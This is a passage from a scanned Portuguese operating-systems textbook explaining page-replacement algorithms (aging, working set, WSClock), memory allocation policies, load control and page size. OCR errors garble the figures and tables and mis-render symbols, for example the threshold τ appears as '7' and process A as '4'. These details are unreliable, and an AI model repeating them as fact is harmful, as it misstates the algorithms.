temente cada página foi referenciada. Quando ocorre 
uma falta de página, aquela com o contador mais baixo 
é escolhida para substituição. 

O principal problema com o NFU é que ele lembra 
um elefante: jamais esquece nada. Por exemplo, em um 
compilador de múltiplos passos, as páginas que foram 
intensamente usadas durante o passo 1 podem ainda ter 
um contador alto bem adiante. Na realidade, se o pas- 
so 1 possuir o tempo de execução mais longo de todos 
os passos, as páginas contendo o código para os passos 
subsequentes poderão ter sempre contadores menores 
do que as páginas do passo 1. Em consequência, o sis- 
tema operacional removerá as páginas úteis em vez das 
que não estão mais sendo usadas. 

Felizmente, uma pequena modificação no algoritmo 
NFU possibilita uma boa simulação do LRU. A modi- 
ficação tem duas partes. Primeiro, os contadores são 
deslocados um bit à direita antes que o bit R seja acres- 
centado. Segundo, o bit R é adicionado ao bit mais à 
esquerda em vez do bit mais à direita. 

A Figura 3.17 ilustra como o algoritmo modificado, 
conhecido como algoritmo de envelhecimento, funcio- 
na. Suponha que após a primeira interrupção de relógio, 
os bits R das páginas 0 a 5 tenham, respectivamente, os 
valores 1,0,1,0,1 e 1 (pagina 0 é 1, página 1 é 0, pagina 
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2 é 1 etc.). Em outras palavras, entre as interrupções de 
relógio 0 e 1, as páginas 0, 2, 4 e 5 foram referenciadas, 
configurando seus bits R para 1, enquanto os outros se- 
guiram em 0. Após os seis contadores correspondentes 
terem sido deslocados e o bit R inserido à esquerda, eles 
têm os valores mostrados na Figura 3.17(a). As quatro 
colunas restantes mostram os seis contadores após as 
quatro interrupções de relógio seguintes. 

Quando ocorre uma falta de página, é removida a 
página cujo contador é o mais baixo. É claro que a pági- 
na que não tiver sido referenciada por, digamos, quatro 
interrupções de relógio, terá quatro zeros no seu conta- 
dor e, desse modo, terá um valor mais baixo do que um 
contador que não foi referenciado por três interrupções 
de relógio. 

Esse algoritmo difere do LRU de duas maneiras im- 
portantes. Considere as páginas 3 e 5 na Figura 3.17(e). 
Nenhuma delas foi referenciada por duas interrupções de 
relógio; ambas foram referenciadas na interrupção ante- 
rior a elas. De acordo com o LRU, se uma página preci- 
sa ser substituída, devemos escolher uma dessas duas. O 
problema é que não sabemos qual delas foi referenciada 
por último no intervalo entre a interrupção 1 e a interrup- 
ção 2. Ao registrar apenas 1 bit por intervalo de tempo, 
perdemos a capacidade de distinguir a ordem das referên- 
cias dentro de um mesmo intervalo. Tudo o que podemos 
fazer é remover a página 3, pois a página 5 também foi 
referenciada duas interrupções antes e a 3, não. 


A segunda diferença entre o algoritmo LRU e o de 
envelhecimento é que, neste último, os contadores têm 
um número finito de bits (8 bits nesse exemplo), o que 
limita seu horizonte passado. Suponha que duas páginas 
cada tenham um valor de contador de 0. Tudo o que 
podemos fazer é escolher uma delas ao acaso. Na rea- 
lidade, é bem provável que uma das páginas tenha sido 
referenciada nove intervalos atrás e a outra, há 1.000 
intervalos. Não temos como ver isso. Na prática, no en- 
tanto, 8 bits geralmente é o suficiente se uma interrup- 
ção de relógio for de em torno de 20 ms. Se uma página 
não foi referenciada em 160 ms, ela provavelmente não 
é importante. 


3.4.8 O algoritmo de substituição de páginas do 
conjunto de trabalho 


Na forma mais pura de paginação, os processos 
são inicializados sem nenhuma de suas páginas na 
memória. Tão logo a CPU tenta buscar a primeira 
instrução, ela detecta uma falta de página, fazendo 
que o sistema operacional traga a página contendo 
a primeira instrução. Outras faltas de páginas para 
variáveis globais e a pilha geralmente ocorrem logo 
em seguida. Após um tempo, o processo tem a maior 
parte das páginas que ele precisa para ser executado 
com relativamente poucas faltas de páginas. Essa es- 
tratégia é chamada de paginação por demanda, pois 


lei) EATA O algoritmo de envelhecimento simula o LRU em software. São mostradas seis páginas para cinco interrupções de relógio. 
As cinco interrupções de relógio são representadas por (a) a (e). 
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10100000 


JoJo of fo]; lef] fe]ol 


11110000 01111000 


01100000 10110000 
00010000 10001000 
01000000 00100000 


10110000 01011000 


01010000 00101000 


(c) (d) (e) 


as páginas são carregadas apenas sob demanda, não 
antecipadamente. 

É claro, é bastante fácil escrever um programa de 
teste que sistematicamente leia todas as páginas em um 
grande espaço de endereçamento, causando tantas fal- 
tas de páginas que não há memória suficiente para con- 
ter todas elas. Felizmente, a maioria dos processos não 
funciona desse jeito. Eles apresentam uma localidade 
de referência, significando que durante qualquer fase 
de execução o processo referencia apenas uma fração 
relativamente pequena das suas páginas. Cada passo de 
um compilador de múltiplos passos, por exemplo, refe- 
rencia apenas uma fração de todas as páginas, e a cada 
passo essa fração é diferente. 

O conjunto de páginas que um processo está atual- 
mente usando é o seu conjunto de trabalho (DEN- 
NING, 1968a; DENNING, 1980). Se todo o conjunto 
de trabalho está na memória, o processo será executado 
sem causar muitas faltas até passar para outra fase de 
execução (por exemplo, o próximo passo do compila- 
dor). Se a memória disponível é pequena demais para 
conter todo o conjunto de trabalho, o processo causará 
muitas faltas de páginas e será executado lentamente, 
já que executar uma instrução leva alguns nanossegun- 
dos e ler em uma página a partir do disco costuma le- 
var 10 ms. A um ritmo de uma ou duas instruções por 
10 ms, seria necessária uma eternidade para terminar. 
Um programa causando faltas de páginas a todo o mo- 
mento está ultrapaginando (thrashing) (DENNING, 
1968b). 

Em um sistema de multiprogramação, os proces- 
sos muitas vezes são movidos para o disco (isto é, 
todas suas páginas são removidas da memória) para 
deixar que os outros tenham sua vez na CPU. A ques- 
tão surge do que fazer quando um processo é trazi- 
do de volta outra vez. Tecnicamente, nada precisa 
ser feito. O processo simplesmente causará faltas de 
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páginas até que seu conjunto de trabalho tenha sido 
carregado. O problema é que ter inúmeras faltas de 
páginas toda vez que um processo é carregado é algo 
lento, e também desperdiça um tempo considerável 
de CPU, visto que o sistema operacional leva alguns 
milissegundos de tempo da CPU para processar uma 
falta de página. 

Portanto, muitos sistemas de paginação tentam con- 
trolar o conjunto de trabalho de cada processo e certi- 
ficar-se de que ele está na memória antes de deixar o 
processo ser executado. Essa abordagem é chamada de 
modelo do conjunto de trabalho (DENNING, 1970). 
Ele foi projetado para reduzir substancialmente o índice 
de faltas de páginas. Carregar as páginas antes de deixar 
um processo ser executado também é chamado de pré- 
-paginação. Observe que o conjunto de trabalho muda 
com o passar do tempo. 

Há muito tempo se sabe que os programas raramente 
referenciam seu espaço de endereçamento de modo uni- 
forme, mas que as referências tendem a agrupar-se em um 
pequeno número de páginas. Uma referência de memória 
pode buscar uma instrução ou dado, ou ela pode armazenar 
dados. Em qualquer instante de tempo, t, existe um con- 
junto consistindo de todas as páginas usadas pelas k refe- 
rências de memória mais recentes. Esse conjunto, w(k, f), 
é o conjunto de trabalho. Como todas as k = 1 referências 
mais recentes precisam ter utilizado páginas que tenham 
sido usadas pelas k > 1 referências mais recentes, e pos- 
sivelmente outras, w(k, £) é uma função monoliticamente 
não decrescente como função de k. A medida que k torna- 
-se grande, o limite de w(k, £) é finito, pois um programa 
não pode referenciar mais páginas do que o seu espaço de 
endereçamento contém, e poucos programas usarão todas 
as páginas. A Figura 3.18 descreve o tamanho do conjunto 
de trabalho como uma função de A. 

O fato de que a maioria dos programas acessa ale- 
atoriamente um pequeno número de páginas, mas que 


leis ES O conjunto de trabalho é o conjunto de páginas usadas pelas k referências da memória mais recentes. A função w(k, t) é o 


tamanho do conjunto de trabalho no instante t. 


w(k,t) 
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esse conjunto muda lentamente com o tempo, explica o 
rápido crescimento inicial da curva e então o crescimen- 
to muito mais lento para o k maior. Por exemplo, um 
programa que está executando um laço ocupando duas 
páginas e acessando dados de quatro páginas pode re- 
ferenciar todas as seis páginas a cada 1.000 instruções, 
mas a referência mais recente a alguma outra página 
pode ter sido um milhão de instruções antes, durante a 
fase de inicialização. Por esse comportamento assintó- 
tico, o conteúdo do conjunto de trabalho não é sensível 
ao valor de k escolhido. Colocando a questão de ma- 
neira diferente, existe uma ampla gama de valores de 
k para os quais o conjunto de trabalho não é alterado. 
Como o conjunto de trabalho varia lentamente com o 
tempo, é possível fazer uma estimativa razoável sobre 
quais páginas serão necessárias quando o programa for 
reiniciado com base em seu conjunto de trabalho quan- 
do foi parado pela última vez. A pré-paginação consiste 
em carregar essas páginas antes de reiniciar o processo. 

Para implementar o modelo do conjunto de trabalho, 
é necessário que o sistema operacional controle quais 
páginas estão nesse conjunto. Ter essa informação leva 
imediatamente também a um algoritmo de substituição 
de página possível: quando ocorre uma falta de página, 
ele encontra uma página que não esteja no conjunto de 
trabalho e a remove. Para implementar esse algoritmo, 
precisamos de uma maneira precisa de determinar quais 
páginas estão no conjunto de trabalho. Por definição, o 
conjunto de trabalho é o conjunto de páginas usadas nas 
k mais recentes referências à memória (alguns autores 
usam as k mais recentes referências às páginas, mas a 
escolha é arbitrária). A fim de implementar qualquer al- 
goritmo do conjunto de trabalho, algum valor de k deve 
ser escolhido antecipadamente. Então, após cada refe- 
rência de memória, o conjunto de páginas usado pelas k 
mais recentes referências à memória é determinado de 
modo único. 

É claro, ter uma definição operacional do conjunto 
de trabalho não significa que há uma maneira eficien- 
te de calculá-lo durante a execução do programa. Seria 
possível se imaginar um registrador de deslocamento de 
comprimento k, com cada referência de memória deslo- 
cando esse registrador de uma posição à esquerda e in- 
serindo à direita o número da página referenciada mais 
recentemente. O conjunto de todos os k números no re- 
gistrador de deslocamento seria o conjunto de trabalho. 
Na teoria, em uma falta de página, o conteúdo de um 
registrador de deslocamento poderia ser lido e ordena- 
do. Páginas duplicadas poderiam, então, ser removidas. 
O resultado seria o conjunto de trabalho. No entanto, 
manter o registrador de deslocamento e processá-lo em 


uma falta de página teria um custo proibitivo, então essa 
técnica nunca é usada. 

Em vez disso, várias aproximações são usadas. Uma 
delas é abandonar a ideia da contagem das últimas k re- 
ferências de memória e em vez disso usar o tempo de 
execução. Por exemplo, em vez de definir o conjunto de 
trabalho como aquelas páginas usadas durante as últimas 
10 milhões de referências de memória, podemos defini-lo 
como o conjunto de páginas usado durante os últimos 100 
ms do tempo de execução. Na prática, tal definição é tão 
boa quanto e muito mais fácil de usar. Observe que para 
cada processo apenas seu próprio tempo de execução con- 
ta. Desse modo, se um processo começa a ser executado 
no tempo T e teve 40 ms de tempo de CPU no tempo real 
T+ 100 ms, para fins de conjunto de trabalho, seu tempo 
é 40 ms. A quantidade de tempo de CPU que um processo 
realmente usou desde que foi inicializado é muitas vezes 
chamada de seu tempo virtual atual. Com essa aproxima- 
ção, o conjunto de trabalho de um processo é o conjunto de 
páginas que ele referenciou durante os últimos 7 segundos 
de tempo virtual. 

Agora vamos examinar um algoritmo de substituição 
de página com base no conjunto de trabalho. A ideia bá- 
sica é encontrar uma página que não esteja no conjunto 
de trabalho e removê-la. Na Figura 3.19 vemos um trecho 
de uma tabela de páginas para alguma máquina. Como 
somente as páginas localizadas na memória são consi- 
deradas candidatas à remoção, as que estão ausentes da 
memória são ignoradas por esse algoritmo. Cada entrada 
contém (ao menos) dois itens fundamentais de informa- 
ção: o tempo (aproximado) que a página foi usada pela 
última vez e o bit R (Referenciada). Um retângulo branco 
vazio simboliza os outros campos que não são necessá- 
rios para esse algoritmo, como o número do quadro de 
página, os bits de proteção e o bit M (modificada). 

O algoritmo funciona da seguinte maneira: supõe-se 
que o hardware inicializa os bits R e M, como já discu- 
tido. De modo similar, presume-se que uma interrupção 
periódica de relógio ative a execução do software que 
limpa o bit Referenciada em cada tique do relógio. A 
cada falta de página, a tabela de páginas é varrida à pro- 
cura de uma página adequada para ser removida. 

À medida que cada entrada é processada, o bit R é 
examinado. Se ele for 1, o tempo virtual atual é escrito 
no campo Instante de último uso na tabela de páginas, 
indicando que a página estava sendo usada no momento 
em que a falta ocorreu. Tendo em vista que a página 
foi referenciada durante a interrupção de relógio atu- 
al, ela claramente está no conjunto de trabalho e não é 
candidata a ser removida (supõe-se que Tt corresponda a 
múltiplas interrupções de relógio). 


[eU lk) Algoritmo do conjunto de trabalho. 
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2204 Tempo virtual atual 


Informação sobre { | SY 
uma pagina 2084 
2003 1 
Po 
Instante do 1980 | 
último uso 1280 
Pagina referenciada 1213 
desde a ultima 
interrupção do relógio 2014 1 
2020 1 
Página não 
referenciada 2032 1 


desde a última 
interrupção do 
relógio 


1620 Jo! 


Tabela de páginas 





Se R é 0, a página não foi referenciada durante a in- 
terrupção de relógio atual e pode ser candidata à remo- 
ção. Para ver se ela deve ou não ser removida, sua idade 
(o tempo virtual atual menos seu Instante de último uso) 
é calculada e comparada a t. Se a idade for maior que 7, 
a página não está mais no conjunto de trabalho e a pági- 
na nova a substitui. A atualização das entradas restantes 
é continuada. 

No entanto, se R é O mas a idade é menor do que ou 
igual a qt, a página ainda está no conjunto de trabalho. A 
página é temporariamente poupada, mas a página com 
a maior idade (menor valor de Instante do último uso) 
é marcada. Se a tabela inteira for varrida sem encontrar 
uma candidata para remover, isso significa que todas 
as páginas estão no conjunto de trabalho. Nesse caso, 
se uma ou mais páginas com R = 0 forem encontradas, 
a que tiver a maior idade será removida. Na pior das 
hipóteses, todas as páginas foram referenciadas durante 
a interrupção de relógio atual (e, portanto, todas com R 
= 1), então uma é escolhida ao acaso para ser removida, 
preferivelmente uma página limpa, se houver uma. 


3.4.9 O algoritmo de substituição de página 
WSClock 


O algoritmo básico do conjunto de trabalho é en- 
fadonho, já que a tabela de páginas inteira precisa ser 
varrida a cada falta de página até que uma candidata 
adequada seja localizada. Um algoritmo melhorado, 
que é baseado no algoritmo de relógio mas também 
usa a informação do conjunto de trabalho, é chamado 
de WSClock (CARR e HENNESSEY, 1981). Por sua 


Bit R (Referenciada) 


Varrer todas as páginas examinando o bit R: 
se (R==1) 
estabelecer Instante do último uso para o tempo virtual atual. 


se (R == 0 e idade > 7) 
remover esta página 


se (R == 0 e idade < 1) 
lembrar o menor tempo 


simplicidade de implementação e bom desempenho, ele 
é amplamente usado na prática. 

A estrutura de dados necessária é uma lista circular 
de quadros de páginas, como no algoritmo do relógio, e 
como mostrado na Figura 3.20(a). De início, essa lista 
está vazia. Quando a primeira página é carregada, ela 
é adicionada à lista. À medida que mais páginas são 
adicionadas, elas vão para a lista para formar um anel. 
Cada entrada contém o campo do Instante do último 
uso do algoritmo do conjunto de trabalho básico, assim 
como o bit R (mostrado) e o bit M (não mostrado). 

Assim como ocorre com o algoritmo do relógio, a 
cada falta de página, a que estiver sendo apontada é exa- 
minada primeiro. Se o bit R for 1, a página foi usada du- 
rante a interrupção de relógio atual, então ela não é uma 
candidata ideal para ser removida. O bit R é então colo- 
cado em 0, o ponteiro avança para a próxima página, e o 
algoritmo é repetido para aquela página. O estado após 
essa sequência de eventos é mostrado na Figura 3.20(b). 

Agora considere o que acontece se a página apon- 
tada tem R = 0, como mostrado na Figura 3.20(c). Se 
a idade é maior do que t e a página está limpa, ela não 
está no conjunto de trabalho e uma cópia válida existe 
no disco. O quadro da página é simplesmente reivindi- 
cado e a nova página colocada lá, como mostrado na 
Figura 3.20(d). Por outro lado, se a página está suja, ela 
não pode ser reivindicada imediatamente, pois nenhuma 
cópia válida está presente no disco. Para evitar um cha- 
veamento de processo, a escrita em disco é escalonada, 
mas o ponteiro é avançado e o algoritmo continua com a 
página seguinte. Afinal, pode haver uma página velha e 
limpa mais adiante e que pode ser usada imediatamente. 
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le]: EFW Operação do algoritmo WSClock. (a) e (b) exemplificam o que acontece quando R = 1. (c) e (d) exemplificam a situação R = 0. 
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Em principio, todas as paginas podem ser escalo- 
nadas para E/S em disco a cada ciclo do relógio. Para 
reduzir o tráfego de disco, um limite pode ser estabele- 
cido, permitindo que um maximo de n páginas sejam re- 
escritas. Uma vez que esse limite tenha sido alcançado, 
não serão escalonadas mais escritas novas. 

O que acontece se o ponteiro deu uma volta comple- 
ta e voltou ao seu ponto de partida? Há dois casos que 
precisamos considerar: 


1. Pelo menos uma escrita foi escalonada. 
2. Nenhuma escrita foi escalonada. 


No primeiro caso, o ponteiro apenas continua a se 
mover, procurando por uma página limpa. Dado que 
uma ou mais escritas foram escalonadas, eventualmente 
alguma escrita será completada e a sua página marcada 
como limpa. A primeira página limpa encontrada é re- 
movida. Essa página não é necessariamente a primeira 
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escrita escalonada porque o driver do disco pode reor- 
denar escritas a fim de otimizar o desempenho do disco. 

No segundo caso, todas as páginas estão no conjunto 
de trabalho, de outra maneira pelo menos uma escrita 
teria sido escalonada. Por falta de informações adicio- 
nais, a coisa mais simples a fazer é reivindicar qual- 
quer página limpa e usá-la. A localização de uma página 
limpa pode ser registrada durante a varredura. Se não 
existir nenhuma, então a página atual é escolhida como 
a vítima e será reescrita em disco. 


3.4.10 Resumo dos algoritmos de substituição de 
página 
Examinamos até agora uma variedade de algoritmos 


de substituição de página. Agora iremos resumi-los breve- 
mente. A lista de algoritmos discutidos está na Figura 3.21. 


Ke Ba Algoritmos de substituição de páginas discutidos no texto. 
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Algoritmo 


Comentário 





Ótimo 


Não implementável, mas útil como um padrão de desempenho 





NRU (não usado recentemente) 


Aproximação muito rudimentar do LRU 





FIFO (primeiro a entrar, primeiro a sair) 


Segunda chance 


Pode descartar páginas importantes 


Algoritmo FIFO bastante melhorado 





Relógio Realista 





LRU (usada menos recentemente) 


Excelente algoritmo, porém difícil de ser implementado de maneira exata 





NFU (não frequentemente usado) 


Aproximação bastante rudimentar do LRU 








f 


Envelhecimento (aging) Algoritmo e 


iciente que aproxima bem o LRU 








Conjunto de trabalho 


Implementação um tanto cara 











WSClock 


Algoritmo bom e eficiente 








O algoritmo ótimo remove a página que será refe- 
renciada por último. Infelizmente, não há uma maneira 
para determinar qual página será essa, então, na prática, 
esse algoritmo não pode ser usado. No entanto, ele é útil 
como uma medida-padrão pela qual outros algoritmos 
podem ser mensurados. 

O algoritmo NRU divide as páginas em quatro clas- 
ses, dependendo do estado dos bits R e M. Uma pági- 
na aleatória da classe de ordem mais baixa é escolhida. 
Esse algoritmo é fácil de implementar, mas é muito ru- 
dimentar. Há outros melhores. 

O algoritmo FIFO controla a ordem pela qual as pá- 
ginas são carregadas na memória mantendo-as em uma 
lista encadeada. Remover a página mais antiga, então, 
torna-se trivial, mas essa página ainda pode estar sendo 
usada, de maneira que o FIFO é uma má escolha. 

O algoritmo segunda chance é uma modificação do 
FIFO que confere se uma página está sendo usada antes 
de removê-la. Se ela estiver, a página é poupada. Essa 
modificação melhora muito o desempenho. O algoritmo 
do relógio é simplesmente uma implementação diferen- 
te do algoritmo segunda chance. Ele tem as mesmas 
propriedades de desempenho, mas leva um pouco me- 
nos de tempo para executar o algoritmo. 

O LRU é um algoritmo excelente, mas não pode ser im- 
plementado sem um hardware especial. Se o hardware não 
estiver disponível, ele não pode ser usado. O NFU é uma 
tentativa rudimentar, não muito boa, de aproximação do 
LRU. No entanto, o algoritmo do envelhecimento é uma 
aproximação muito melhor do LRU e pode ser implemen- 
tado de maneira eficiente. Trata-se de uma boa escolha. 

Os últimos dois algoritmos usam o conjunto de tra- 
balho. O algoritmo do conjunto de trabalho proporciona 


um desempenho razoável, mas é de certa maneira caro 
de ser implementado. O WSClock é uma variante que 
não apenas proporciona um bom desempenho, como 
também é eficiente de ser implementado. 

Como um todo, os dois melhores algoritmos são o 
do envelhecimento e o WSClock. Eles são baseados no 
LRU e no conjunto de trabalho, respectivamente. Am- 
bos proporcionam um bom desempenho de paginação e 
podem ser implementados eficientemente. Alguns ou- 
tros bons algoritmos existem, mas esses dois provavel- 
mente são os mais importantes na prática. 


3.5 Questões de projeto para sistemas de 
paginação 


Nas seções anteriores explicamos como a pagi- 
nação funciona e introduzimos alguns algoritmos de 
substituição de página básicos. Mas conhecer os me- 
canismos básicos não é o suficiente. Para projetar um 
sistema e fazê-lo funcionar bem, você precisa saber 
bem mais. É como a diferença entre saber como mover 
a torre, o cavalo e o bispo, e outras peças do xadrez, 
e ser um bom jogador. Nas seções seguintes, exami- 
naremos outras questões que os projetistas de siste- 
mas operacionais têm de considerar cuidadosamente 
a fim de obter um bom desempenho de um sistema de 
paginação. 


3.5.1 Políticas de alocação local versus global 


Nas seções anteriores discutimos vários algoritmos 
de escolha da página a ser substituída quando ocorresse 


154] | SISTEMAS OPERACIONAIS MODERNOS 


uma falta. Uma questão importante associada com essa 
escolha (cuja discussão varremos cuidadosamente para 
baixo do tapete até agora) é sobre como a memória deve 
ser alocada entre os processos concorrentes em execução. 

Dê uma olhada na Figura 3.22(a). Nessa figura, três 
processos, A, B e C, compõem o conjunto dos processos 
executáveis. Suponha que 4 tenha uma falta de página. 
O algoritmo de substituição de página deve tentar en- 
contrar a página usada menos recentemente consideran- 
do apenas as seis páginas atualmente alocadas para 4, 
ou ele deve considerar todas as páginas na memória? Se 
ele considerar somente as páginas de 4, a página com o 
menor valor de idade será 45, de modo que obteremos a 
situação da Figura 3.22(b). 

Por outro lado, se a página com o menor valor de ida- 
de for removida sem levar em conta a quem pertence, a 
página B3 será escolhida e teremos a situação da Figura 
3.22(c). O algoritmo da Figura 3.22(b) é um algoritmo 
de substituição de página local, enquanto o da Figura 
3.22(c) é um algoritmo global. Algoritmos locais efe- 
tivamente correspondem a alocar a todo processo uma 
fração fixa da memória. Algoritmos globais alocam 
dinamicamente quadros de páginas entre os processos 
executáveis. Desse modo, o número de quadros de pá- 
ginas designadas a cada processo varia com o tempo. 

Em geral, algoritmos globais funcionam melhor, 
especialmente quando o tamanho do conjunto de tra- 
balho puder variar muito através do tempo de vida de 
um processo. Se um algoritmo local for usado e o con- 
junto de trabalho crescer, resultará em ultrapaginação, 
mesmo se houver um número suficiente de quadros de 
páginas disponíveis. Se o conjunto de trabalho diminuir, 
os algoritmos locais vão desperdiçar memória. Se um 


algoritmo global for usado, o sistema terá de decidir 
continuamente quantos quadros de páginas designar 
para cada processo. Uma maneira é monitorar o tama- 
nho do conjunto de trabalho como indicado pelos bits 
de envelhecimento, mas essa abordagem não evita ne- 
cessariamente a ultrapaginação. O conjunto de trabalho 
pode mudar de tamanho em milissegundos, enquanto os 
bits de envelhecimento são uma medida muito rudimen- 
tar estendida a um número de interrupções de relógio. 

Outra abordagem é ter um algoritmo para alocar 
quadros de páginas para processos. Uma maneira é 
determinar periodicamente o número de processos em 
execução e alocar a cada processo uma porção igual. 
Desse modo, com 12.416 quadros de páginas disponí- 
veis (isto é, sistema não operacional) e 10 processos, 
cada processo recebe 1.241 quadros. Os seis restantes 
vão para uma área comum a ser usada quando ocorrer a 
falta de página. 

Embora esse método possa parecer justo, faz pouco 
sentido conceder porções iguais de memória a um pro- 
cesso de 10 KB e a um processo de 300 KB. Em vez 
disso, as páginas podem ser alocadas em proporção ao 
tamanho total de cada processo, com um processo de 
300 KB recebendo 30 vezes a quantidade alocada a um 
processo de 10 KB. Parece razoável dar a cada processo 
algum número mínimo, de maneira que ele possa ser 
executado por menor que seja. Em algumas máquinas, 
por exemplo, uma única instrução de dois operandos 
pode precisar de até seis páginas, pois a instrução em 
si, o operando fonte e o operando destino podem todos 
extrapolar os limites da página. Com uma alocação de 
apenas cinco páginas, os programas contendo tais ins- 
truções não poderão ser executados. 
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Se um algoritmo global for usado, talvez seja pos- 
sível começar cada processo com algum número de 
páginas proporcional ao tamanho do processo, mas 
a alocação precisa ser atualizada dinamicamente à 
medida que ele é executado. Uma maneira de geren- 
ciar a alocação é usar o algoritmo PFF (Page Fault 
Frequency — frequência de faltas de página). Ele diz 
quando aumentar ou diminuir a alocação de páginas 
de um processo, mas não diz nada sobre qual página 
substituir em uma falta. Ele apenas controla o tamanho 
do conjunto de alocação. 

Para uma grande classe de algoritmos de substitui- 
ção de páginas, incluindo LRU, sabe-se que a taxa de 
faltas diminui à medida que mais páginas são designa- 
das, como discutimos. Esse é o pressuposto por trás da 
PFF. Essa propriedade está ilustrada na Figura 3.23. 

Medir a frequência de faltas de página é algo di- 
reto: apenas conte o número de faltas por segundo, 
possivelmente tomando a média de execução através 
dos últimos segundos também. Uma maneira fácil 
de fazer isso é somar o número de faltas durante o 
segundo imediatamente anterior à média de execu- 
ção atual e dividir por dois. A linha tracejada 4 cor- 
responde a uma frequência de faltas de página que é 
inaceitavelmente alta, portanto o processo que gerou 
as faltas de páginas recebe mais quadros de páginas 
para reduzir a frequência de faltas. A linha tracejada 
B corresponde a uma frequência de faltas de página 
tão baixa que podemos presumir que o processo tem 
memória demais. Nesse caso, molduras de páginas 
podem ser retiradas. Assim, PFF tentará manter a fre- 
quência de paginação para cada processo dentro de 
limites aceitáveis. 

É importante observar que alguns algoritmos de subs- 
tituição de página podem funcionar com uma política de 
substituição local ou uma global. Por exemplo, FIFO 
pode substituir a página mais antiga em toda a memó- 
ria (algoritmo global) ou a página mais antiga possuída 
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pelo processo atual (algoritmo local). De modo simi- 
lar, LRU — ou algum algoritmo aproximado — pode 
substituir a página menos usada recentemente em toda 
a memória (algoritmo global) ou a página menos usada 
recentemente possuída pelo processo atual (algoritmo 
local). A escolha de local versus global, em alguns ca- 
sos, é independente do algoritmo. 

Por outro lado, para outros algoritmos de substitui- 
ção de página, apenas uma estratégia local faz sentido. 
Em particular, o conjunto de trabalho e os algoritmos 
WSClock referem-se a algum processo específico e de- 
vem ser aplicados nesse contexto. Na realidade, não há 
um conjunto de trabalho para a máquina como um todo, e 
tentar usar a união de todos os conjuntos de trabalho per- 
deria a propriedade de localidade e não funcionaria bem. 


3.5.2 Controle de carga 


Mesmo com o melhor algoritmo de substituição de 
páginas e uma ótima alocação global de quadros de pá- 
ginas para processar, pode ocorrer a ultrapaginação. Na 
realidade, sempre que os conjuntos de trabalho combi- 
nados de todos os processos excedem a capacidade da 
memória, a ultrapaginação pode ser esperada. Um sin- 
toma dessa situação é que o algoritmo PFF indica que 
alguns processos precisam de mais memória, mas ne- 
nhum processo precisa de menos memória. Nesse caso, 
não há maneira de dar mais memória àqueles processos 
que precisam dela sem prejudicar alguns outros. A úni- 
ca solução real é livrar-se temporariamente de alguns 
processos. 

Uma boa maneira de reduzir o número de processos 
competindo pela memória é levar alguns deles para o 
disco e liberar todas as páginas que eles estão seguran- 
do. Por exemplo, um processo pode ser levado para o 
disco e seus quadros de páginas divididos entre outros 
processos que estão ultrapaginando. Se a ultrapagina- 
ção parar, o sistema pode executar por um tempo dessa 
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maneira. Se ela nao parar, outro processo tem de ser 
levado para o disco e assim por diante, até a ultrapa- 
ginação cessar. Desse modo, mesmo com a paginação, 
a troca de processos entre a memória e o disco talvez 
ainda possa ser necessária, apenas agora ela será usada 
para reduzir a demanda potencial por memória, em vez 
de reivindicar páginas. 

A ideia de trocar processos para o disco para aliviar a 
carga sobre a memória é reminiscente do escalonamen- 
to de dois níveis, no qual alguns processos são coloca- 
dos em disco e um escalonador de curto prazo é usado 
para escalonar os processos restantes. Claramente, as 
duas ideias podem ser combinadas, de modo que se re- 
mova apenas um número suficiente de processos para o 
disco com o intuito de tornar aceitável a frequência de 
faltas de páginas. Periodicamente, alguns processos são 
trazidos do disco para a memória e outros são levados 
para ele. 

No entanto, outro fator a ser considerado é o grau 
de multiprogramação. Quando o número de processos 
na memória principal é baixo demais, a CPU pode ficar 
ociosa por períodos substanciais. Esse fator recomenda 
considerar não somente o tamanho dos processos e fre- 
quência da paginação ao decidir qual processo deve ser 
trocado, mas também características, como se o proces- 
so seria do tipo limitado pela CPU ou por E/S, e quais 
características os processos restantes têm. 


3.5.3 Tamanho de página 


O tamanho de página é um parâmetro que pode ser 
escolhido pelo sistema operacional. Mesmo que o 
hardware tenha sido projetado com, por exemplo, pá- 
ginas de 4096 bytes, o sistema operacional pode facil- 
mente considerar os pares de pagina 0 e 1,2 e 3,4€e 
5, e assim por diante, como páginas de 8 KB sempre 
alocando dois quadros de páginas de 8192 bytes conse- 
cutivas para eles. 

Determinar o melhor tamanho de página exige equi- 
librar vários fatores competindo entre si. Como resul- 
tado, não há um tamanho ótimo geral. Para começo 
de conversa, dois fatores pedem um tamanho de pági- 
na pequeno. Um segmento de código, dados, ou pilha 
escolhido ao acaso não ocupará um número inteiro de 
páginas. Na média, metade da página final estará va- 
zia. O espaço extra nessa página é desperdiçado. Esse 
desperdício é chamado de fragmentação interna. Com 
n segmentos na memória e um tamanho de página de p 
bytes, np/2 bytes serão desperdiçados em fragmentação 
interna. Esse raciocínio defende um tamanho de página 
pequeno. 


Outro argumento em defesa de um tamanho de pá- 
gina pequeno torna-se aparente quando pensamos sobre 
um programa consistindo em oito fases sequenciais de 
4 KB cada. Com um tamanho de página de 32 KB, esse 
programa demandará 32 KB durante o tempo inteiro de 
execução. Com um tamanho de página de 16 KB, ele 
precisará de apenas 16 KB. Com um tamanho de página 
de 4 KB ou menor, ele exigirá apenas 4 KB a qualquer 
instante. Em geral, um tamanho de página grande cau- 
sará mais desperdício de espaço na memória. 

Por outro lado, páginas pequenas implicam que os 
programas precisarão de muitas páginas e, desse modo, 
uma tabela grande de páginas. Um programa de 32 KB 
precisa apenas de quatro páginas de 8 KB, mas 64 pá- 
ginas de 512 bytes. Transferências para e do disco são 
geralmente uma página de cada vez, com a maior parte 
do tempo sendo gasta no posicionamento da cabeça de 
leitura/gravação e no tempo de rotação necessário para 
que a cabeça de leitura/gravação atinja o setor correto, 
então a transferência de uma página pequena leva pra- 
ticamente o mesmo tempo que a de uma página grande. 
Podem ser necessários 64 x 10 ms para carregar 64 pá- 
ginas de 512 bytes, mas somente 4 x 12 ms para carre- 
gar quatro páginas de 8 KB. 

Além disso, páginas pequenas ocupam muito espa- 
ço no TLB. Digamos que seu programa use | MB de 
memória com um conjunto de trabalho de 64 KB. Com 
páginas de 4 KB, o programa ocuparia pelo menos 16 
entradas no TLB. Com páginas de 2 MB, uma única 
entrada de TLB seria suficiente (na teoria, mas talvez 
você queira separar dados de instruções). Como entra- 
das de TLB são escassas e críticas para o desempenho, 
vale a pena usar páginas grandes sempre que possível. 
Para equilibrar essas escolhas, sistemas operacionais às 
vezes usam tamanhos diferentes de páginas para par- 
tes diferentes do sistema. Por exemplo, páginas grandes 
para o núcleo e menores para os processos do usuário. 

Em algumas máquinas, a tabela de páginas deve ser 
